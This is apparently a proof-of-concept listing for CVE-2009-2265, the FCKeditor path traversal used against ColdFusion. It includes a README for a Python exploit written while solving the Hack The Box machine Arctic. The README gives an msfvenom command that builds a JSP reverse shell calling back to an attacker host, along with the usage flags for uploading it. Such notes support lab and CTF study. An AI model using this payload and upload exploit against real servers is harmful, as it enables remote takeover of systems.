POC详情: bc065872d9e033b85848235e85d68aff0283776c

标题: FCKeditor 路径遍历漏洞 (CVE-2009-2265)
描述:FCKeditor是个人开发者的一款开源的专用于在网页上编辑HTML的编辑器。 FCKeditor的editor/filemanager/browser/default/connectors/php/connector.php模块中存在路径遍历漏洞: 147.function FileUpload( $resourceType, $currentFolder ) 148.{ 149.$sErrorNumber = '0' ; 150.$sFileName = '' ; 151. 152.if ( isse
coldfusion exploit based on https://cvedetails.com/cve/CVE-2009-2265/
# zaphoxx-coldfusion
coldfusion exploit based on https://cvedetails.com/cve/CVE-2009-2265/

The main reason I setup a python script for this particular cve was that the metasploit version of the same did not work for me when I tried to solve the HTB machine Arctic. Also it was nice to get some little python pratice. However there is another python version of that same exploit around which was originally created by Alexander Reid if you prefer to use his version.

Usage is pretty simple:

Make sure you have a payload file created 

e.g. using msfvenom:
`msfvenom -p java/jsp_shell_reverse_tcp -f raw LHOST=<yourip> LPORT=<yourport> -o shell.jsp`

usage: `python3 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]`

   `usage: 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]`
optional arguments:
  `-h, --help   show this help message and exit`
  `-t TARGET    target ip`
  `-p PORT      target port`
  `-f FILEPATH  path of file with shellcode to upload`
  `-b BASEPATH  coldfusion basepath`


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